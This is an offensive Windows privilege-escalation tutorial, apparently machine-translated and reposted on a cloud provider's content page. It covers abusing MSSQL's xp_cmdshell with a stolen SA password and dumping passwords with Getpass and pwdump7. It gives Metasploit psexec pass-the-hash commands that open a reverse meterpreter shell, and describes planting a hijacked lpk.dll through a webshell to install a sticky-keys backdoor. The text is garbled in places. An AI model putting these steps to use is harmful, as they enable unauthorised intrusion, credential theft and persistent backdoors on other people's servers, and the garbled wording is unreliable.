Right of collection (ii)----Windows Service server right of access to the MSSQL, Getpass rights, the right to hash, lpk right to withdraw

Source: Internet
Author: User

(i), MSSQL rights

Prerequisites: Get the account password of the user SA with the highest privileges to the MSSQL database

MSSQL Default port: 1433

MSSQL highest privilege User: SA

Once the sa password is obtained, it is connected directly through the tool.

MSSQL comes with a xp_cmdshell used to execute the cmd command.

(b), Getpass rights

A tool to get a computer user account password

(iii), hash transfer intrusion MSF loading

Hash algorithm: How to encrypt windows passwords

MSF download:http://www.rapid7.com/products/metasploit/download.jsp

Use Kali demo below

MSF uses:

Msfconsole//Start terminal

Use Exploit/windows/smb/psexec//module

Show Options//View module options Properties

Set PAYLOAD windows/meterpreter/reverse_tcp//Set exploit vectors

Show targets//view the attack target properties of the module

Set Lhost//setting the native address
Set RHOST 192.168.0.254//Setting properties Destination host Address
Set Smbuser Administrators//settings property user


Set Smbpass XXX//Set properties ciphertext hash

How is the hash of the target host acquired? You can get the hash value by PWDUMP7 this tool.

Just copy the following paragraph.

Exploit//Start attack

Get current shell, execute command



(iv), LPK's right to raise


Trigger: The directory exists EXE file is executed, his feature is that every executable file to be loaded before the file, the Windows system is to determine whether the current file directory exists this file, if the directory exists under the file is executed, if not exist will execute the DLL under the System32 directory.


Startup scenario: 3389 Remote Desktop Connection starts (continuous shift, then press hot key)


Power scheme: Generate Lpk.dll, upload to file directory via Webshell, wait for administrator to trigger EXE program.

Run LPK setch This tool selection, 2 key start, at this time the 2 Key 3 key value is LPK sethc built-in fixed numbers, such as 65,66 corresponds to a and B.

Then click Build, upload the generated lpk.dll to any directory, and run any of these EXE files, Lpk.dll will be automatically replaced with the shift backdoor.

I have it generated in the software directory, and then click to run the software

Then connect remotely, press the SHIFT key five times, and the following prompt will appear

Then press the combination key at the same time (that is, where set 65, 66, corresponding to a, b), the following password box appears

Enter the password and you will get to the following interface!!!

can also be used to execute software, such as to open 3389, in the generation of Lpk.dll is selected

Generate Lpk.dll and then put it in any directory, remote is off before the software is executed

Then execute EXE software, hello find remote was opened.

Right of collection (ii)----Windows Service server right of access to the MSSQL, Getpass rights, the right to hash, lpk right to withdraw

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.